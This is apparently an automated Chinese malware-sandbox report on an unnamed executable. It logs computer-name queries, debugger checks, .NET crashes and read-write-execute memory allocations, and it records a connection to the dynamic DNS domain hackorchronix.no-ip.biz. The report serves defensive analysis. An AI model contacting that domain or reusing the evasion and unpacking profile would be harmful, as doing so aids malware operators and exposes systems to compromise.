3.7
中危

0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e

0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe

分析耗时

73s

最近分析

386天前

文件大小

78.5KB
静态报毒 动态报毒 UNKNOWN
鹰眼引擎
DACN 0.14
FACILE 1.00
IMCLNet 0.93
MFGraph 0.00
静态判定
反病毒引擎
未检测 暂无反病毒引擎检测结果
静态指标
查询计算机名称 (25 个事件)
Time & API Arguments Status Return Repeated
1727545301.765125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.156125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.265125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.265125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.312125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.312125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545305.328125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.890125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.890125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.906125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.922125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.922125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545306.937125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.406125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.422125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.422125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.437125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.437125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545308.453125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.937125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.953125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.953125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.968125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.984125
GetComputerNameW
computer_name: TU-PC
success 1 0
1727545309.984125
GetComputerNameW
computer_name: TU-PC
success 1 0
检查进程是否被调试器调试 (2 个事件)
Time & API Arguments Status Return Repeated
1727545293.359625
IsDebuggerPresent
failed 0 0
1727545295.484125
IsDebuggerPresent
failed 0 0
一个或多个进程崩溃 (8 个事件)
Time & API Arguments Status Return Repeated
1727545305.437125
__exception__
exception.address: 0x7512fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 b9 6c eb 11 8b c8 e8 a2 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 41852916
registers.esp: 88994600
registers.ebp: 88994632
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545305.437125
__exception__
exception.address: 0x75131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 b9 6c eb 11 8b c8 e8 82 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 7672600
registers.ecx: 0
registers.edx: 88994600
registers.ebx: 41852916
registers.esp: 88994600
registers.ebp: 88994632
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545306.953125
__exception__
exception.address: 0x7512fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 b9 6c eb 11 8b c8 e8 a2 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 41852916
registers.esp: 88994424
registers.ebp: 88994456
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545306.953125
__exception__
exception.address: 0x75131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 b9 6c eb 11 8b c8 e8 82 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 7672600
registers.ecx: 0
registers.edx: 88994424
registers.ebx: 41852916
registers.esp: 88994424
registers.ebp: 88994456
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545308.468125
__exception__
exception.address: 0x7512fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 b9 6c eb 11 8b c8 e8 a2 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 41852916
registers.esp: 88994248
registers.ebp: 88994280
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545308.484125
__exception__
exception.address: 0x75131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 b9 6c eb 11 8b c8 e8 82 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 7672600
registers.ecx: 0
registers.edx: 88994248
registers.ebx: 41852916
registers.esp: 88994248
registers.ebp: 88994280
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545310.000125
__exception__
exception.address: 0x7512fe
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 43 c9 b9 6c eb 11 8b c8 e8 a2 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 0
registers.ecx: 0
registers.edx: 0
registers.ebx: 41852916
registers.esp: 88994072
registers.ebp: 88994104
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
0x750f4a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
1727545310.015125
__exception__
exception.address: 0x75131e
exception.instruction: cmp dword ptr [ecx], ecx
exception.instruction_r: 39 09 e8 23 c9 b9 6c eb 11 8b c8 e8 82 43 f8 6f
exception.symbol:
exception.exception_code: 0xc0000005
registers.eax: 7672600
registers.ecx: 0
registers.edx: 88994072
registers.ebx: 41852916
registers.esp: 88994072
registers.ebp: 88994104
registers.esi: 41850624
registers.edi: 0
stacktrace:
0x750f3a
0x750f4a
0x750f4a
0x750f4a
mscorlib+0x216e76 @ 0x6ce76e76
mscorlib+0x2202ff @ 0x6ce802ff
mscorlib+0x216df4 @ 0x6ce76df4
CoUninitializeEE-0x29870 mscorwks+0x1b4c @ 0x6f6e1b4c
CoUninitializeEE-0x125de mscorwks+0x18dde @ 0x6f6f8dde
CoUninitializeEE-0x4990 mscorwks+0x26a2c @ 0x6f706a2c
CoUninitializeEE-0x495d mscorwks+0x26a5f @ 0x6f706a5f
CoUninitializeEE-0x493f mscorwks+0x26a7d @ 0x6f706a7d
DllRegisterServerInternal+0x4cf2b GetPrivateContextsPerfCounters-0xa76e mscorwks+0xa3191 @ 0x6f783191
CreateAssemblyNameObject+0xb7ec DllRegisterServerInternal-0x4937 mscorwks+0x5192f @ 0x6f73192f
CreateAssemblyNameObject+0xb788 DllRegisterServerInternal-0x499b mscorwks+0x518cb @ 0x6f7318cb
CreateAssemblyNameObject+0xb6ae DllRegisterServerInternal-0x4a75 mscorwks+0x517f1 @ 0x6f7317f1
CreateAssemblyNameObject+0xb83a DllRegisterServerInternal-0x48e9 mscorwks+0x5197d @ 0x6f73197d
DllRegisterServerInternal+0x4ccfc GetPrivateContextsPerfCounters-0xa99d mscorwks+0xa2f62 @ 0x6f782f62
DllRegisterServerInternal+0x4cdd6 GetPrivateContextsPerfCounters-0xa8c3 mscorwks+0xa303c @ 0x6f78303c
GetMetaDataInternalInterface+0xcf27 _CorDllMain-0x9ae mscorwks+0x16805a @ 0x6f84805a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76ee33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x775b9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x775b9ea5

success 0 0
行为判定
动态指标
连接到动态 DNS 域 (1 个事件)
domain hackorchronix.no-ip.biz
分配可读-可写-可执行内存(通常用于自解压) (50 out of 60 个事件)
Time & API Arguments Status Return Repeated
1727545293.328625
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6fc91000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.359625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0052a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.359625
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6fc92000
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.359625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00522000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.422625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00532000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.437625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00533000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.437625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0057b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.437625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00577000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.437625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0053c000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.515625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00680000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.531625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00534000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.531625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00546000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.547625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0053a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.562625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0056a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.578625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00562000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.593625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00575000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.687625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0052b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.703625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0054a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545293.703625
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00547000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 3012
success 0 0
1727545295.468125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6f6e1000
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.484125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0051a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.484125
NtProtectVirtualMemory
process_handle: 0xffffffff
base_address: 0x6f6e2000
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.484125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00512000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.515125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00522000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.531125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00523000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.531125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0055b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.531125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00557000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.531125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0052c000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.562125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00750000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.562125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0054a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.578125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00542000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.578125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00524000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.578125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00555000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.625125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00525000
region_size: 8192
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.625125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00527000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.625125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0053a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.625125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00537000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545295.640125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0051b000
region_size: 4096
